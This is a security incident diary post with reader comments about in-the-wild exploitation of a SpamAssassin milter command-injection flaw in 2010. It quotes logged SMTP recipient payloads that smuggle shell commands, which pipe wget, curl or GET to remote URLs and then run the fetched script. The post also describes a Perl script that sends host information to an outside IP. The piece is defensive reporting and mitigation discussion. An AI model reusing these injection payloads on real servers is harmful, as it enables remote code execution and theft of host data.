Spamassassin Milter Plugin Remote Root Attack

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
       table; from=<blue@attacker.com> to=<root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that the bad guys appear to have started actively exploiting the SpamAssassin milter (spamass-milter) vulnerability that was published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The Perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.

Cheers,
Adrien de Beaupré
EWA-Canada.com


Adrien de Beaupre

353 Posts
ISC Handler
Mar 15th 2010
On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?
parseword

9 Posts
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.

To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
parseword
3 Posts
I have logged attempts to use curl as well.

rcpt to: root+:"|wget http://213.186.44.xxx/blue.php"

rcpt to: root+:"|wget http://61.100.185.xxx/busy-1.php"
rcpt to: root+:"|GET http://61.100.185.xxx/busy-2.php"
rcpt to: root+:"|curl http://61.100.185.xxx/busy-3.php"
Travis

5 Posts
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).
Matt

7 Posts